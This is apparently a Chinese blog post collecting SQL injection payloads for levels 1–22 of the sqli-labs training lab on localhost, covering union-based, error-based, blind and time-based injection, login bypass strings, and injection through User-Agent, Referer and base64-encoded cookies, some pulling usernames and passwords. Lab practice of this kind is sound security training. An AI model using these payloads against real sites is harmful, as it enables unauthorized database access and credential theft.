Sqli-labs靶场payload（1-22基础篇）原创

最新推荐文章于 2022-12-27 10:07:05 发布

Simon_Smith

最新推荐文章于 2022-12-27 10:07:05 发布

阅读量790

点赞数

分类专栏： Web安全文章标签：数据库 web安全安全

本文链接：https://blog.csdn.net/weixin_51339377/article/details/123574997

版权

Web安全专栏收录该内容

32 篇文章 3 订阅

订阅专栏

T1 字符型单引号闭合(union select注入)

http://127.0.0.1/sqli-labs/Less-1/?id=-1' union select 1,2,3 %23
http://127.0.0.1/sqli-labs/Less-1/?id=-1' union select 1,2,3 --+

T2数字型(union select注入)

http://127.0.0.1/sqli-labs/Less-2/?id=1 and 1=2
http://127.0.0.1/sqli-labs/Less-2/?id=1 order by 3
http://127.0.0.1/sqli-labs/Less-2/?id=-1 union select 1,2,3

T3字符型闭合： ('') (union select注入)

http://127.0.0.1/sqli-labs/Less-3/?id=1') --+
http://127.0.0.1/sqli-labs/Less-3/?id=-1') union select 1,2,3 --+

T4字符型闭合： ("") (union select注入)

http://127.0.0.1/sqli-labs/Less-4/?id=1") --+
http://127.0.0.1/sqli-labs/Less-4/?id=-1") union select 1,2,3 --+

T5字符型单引号闭合布尔盲注/报错注入

http://127.0.0.1/sqli-labs/Less-5/?id=1' --+
http://127.0.0.1/sqli-labs/Less-5/?id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),1) --+
http://127.0.0.1/sqli-labs/Less-5/?id=1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1),0x7e),1) --+
http://127.0.0.1/sqli-labs/Less-5/?id=1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 1,1),0x7e),1) --+
http://127.0.0.1/sqli-labs/Less-5/?id=1' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),0x7e),1) --+
http://127.0.0.1/sqli-labs/Less-5/?id=1' and updatexml(1,concat(0x7e,(select username from users limit 0,1),0x7e),1) --+
http://127.0.0.1/sqli-labs/Less-5/?id=1' and updatexml(1,concat(0x7e,(select password from users limit 0,1),0x7e),1) --+
http://127.0.0.1/sqli-labs/Less-5/?id=1' and updatexml(1,concat(0x7e,(select username from users limit 1,1),0x7e),1) --+
http://127.0.0.1/sqli-labs/Less-5/?id=1' and updatexml(1,concat(0x7e,(select password from users limit 1,1),0x7e),1) --+

http://127.0.0.1/sqli-labs/Less-5/?id=1' and (select database()='security') --+
http://127.0.0.1/sqli-labs/Less-5/?id=1' and (select ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)) > 100) --+
http://127.0.0.1/sqli-labs/Less-5/?id=1' and (select table_name from information_schema.tables where table_schema='security' limit 0,1) --+

T6字符型双引号闭合报错注入/布尔盲注

http://127.0.0.1/sqli-labs/Less-6/?id=1" --+
http://127.0.0.1/sqli-labs/Less-6/?id=1" and updatexml(1,concat(0x7e,(select database()),0x7e),1) --+

T8字符型单引号闭合布尔盲注

http://127.0.0.1/sqli-labs/Less-8/?id=1' and (select database()='security') --+

T9字符型单引号闭合时间盲注

127.0.0.1/sqli-labs/Less-9/?id=1' and sleep(5) --+   //经过尝试 只有单引号可以成功执行 所以是单引号闭合
127.0.0.1/sqli-labs/Less-9/?id=2' and if((select database())="security",sleep(5),null) --+

T10字符型双引号闭合时间盲注

127.0.0.1/sqli-labs/Less-10/?id=1" and sleep(5) --+
127.0.0.1/sqli-labs/Less-10/?id=2" and if((select database())="security",sleep(5),null) --+

T11 POST注入 union select注入单引号闭合

username:
' order by 2 #
' union select 1,2 #
' union select 1,database() #
' union select 1,table_name from information_schema.tables where table_schema="security" limit 0,1 #
' union select 1,table_name from information_schema.tables where table_schema="security" limit 3,1 #
' union select 1,column_name from information_schema.columns where table_schema="security" and table_name="users" limit 0,1 #
' union select username,password from users limit 0,1 #

T12 POST注入 union select注入闭合方式： ("")

") order by 2 #
") union select 1,2 #

T13 POST注入闭合方式（''）union select没有回显报错注入/盲注

') #
') union select 1,2 #   
') and updatexml(1,concat(0x7e,(select database()),0x7e),1) #
') and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema="security" limit 0,1),0x7e),1) #

T14 POST注入闭合方式"" union select没有回显报错注入/盲注

" #
" order by 2 #
" union select 1,2 #   
" and updatexml(1,concat(0x7e,(select database()),0x7e),1) #
" or updatexml(1,concat(0x7e,(select database()),0x7e),1) #
" and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema="security" limit 0,1),0x7e),1) #

T15 POST注入盲注单引号闭合方法2：构造万能密码

' or 1=1 #     //四种组合中唯一成功的 说明闭合方式是单引号
' or updatexml(1,concat(0x7e,(select database()),0x7e),1) #   //报错注入没有回显 则接下来用盲注方式
' or (select database()='security') #
' or (select ascii(substr((select table_name from information_schema.tables where table_schema="security" limit 0,1),1,1))>100) #
' or (select ascii(substr((select table_name from information_schema.tables where table_schema="security" limit 0,1),1,1))>110) #
' or (select ascii(substr((select table_name from information_schema.tables where table_schema="security" limit 0,1),1,1))<105) #
' or (select ascii(substr((select table_name from information_schema.tables where table_schema="security" limit 0,1),1,1))<102) #
' or (select ascii(substr((select table_name from information_schema.tables where table_schema="security" limit 0,1),1,1))=101) #
' or (select substr((select table_name from information_schema.tables where table_schema="security" limit 0,1),1,1) = 'e') # 

' or '1'='1

T16 POST注入盲注方法2：构造万能密码

") or 1=1 #
") or (select database()='security') #

") or ("1")=("1

T17 POST注入密码重置

username:admin

password:' or 1=1 #

//此时所有的密码都被重置成了1

T18 POST注入 HTTP头注入之User-Agent注入

User-Agent的测试不能用注释符号
测试发现闭合是单引号
' and '1'='1
' and updatexml(1,concat(0x7e,(select database()),0x7e),1) and '1'='1
' and extractvalue(1,concat(0x7e,(select database()),0x7e)) and '1'='1

T19 POST注入 HTTP-Head之Referer注入

' and '1'='1
' and extractvalue(1,concat(0x7e,(select database()),0x7e)) and '1'='1

T20 POST注入 Cookie注入

' #
' or extractvalue(1,concat(0x7e,(select database()),0x7e)) #
admin' and extractvalue(1,concat(0x7e,(select database()),0x7e)) #
' or extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema="security" limit 0,1),0x7e)) #
' or extractvalue(1,concat(0x7e,(select username from users limit 0,1),0x7e)) #

T21 POST注入 Cookie注入变形闭合('') (所有的内容都base64加密以后再提交即可)

\    XA==   
') #     JykgIw==
') or extractvalue(1,concat(0x7e,(select database()),0x7e)) #    Jykgb3IgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBkYXRhYmFzZSgpKSwweDdlKSkgIw==
admin') and extractvalue(1,concat(0x7e,(select database()),0x7e)) #      YWRtaW4nKSBhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBkYXRhYmFzZSgpKSwweDdlKSkgIw==

uname=') and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e),1) or ('1')=('1

T22 POST注入 Cookie注入变形闭合 "" (所有的内容都base64加密以后再提交即可)

\   XA==
" #    IiAj 
" or extractvalue(1,concat(0x7e,(select database()),0x7e)) #      IiBvciBleHRyYWN0dmFsdWUoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IGRhdGFiYXNlKCkpLDB4N2UpKSAj
admin" or extractvalue(1,concat(1,concat(0x7e,(select database()),0x7e),1)) #     YWRtaW4iIG9yIGV4dHJhY3R2YWx1ZSgxLGNvbmNhdCgxLGNvbmNhdCgweDdlLChzZWxlY3QgZGF0YWJhc2UoKSksMHg3ZSksMSkpICM=
admin" and extractvalue(1,concat(0x7e,(select database()),0x7e)) and "1"="1      YWRtaW4iIGFuZCBleHRyYWN0dmFsdWUoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IGRhdGFiYXNlKCkpLDB4N2UpKSBhbmQgIjEiPSIx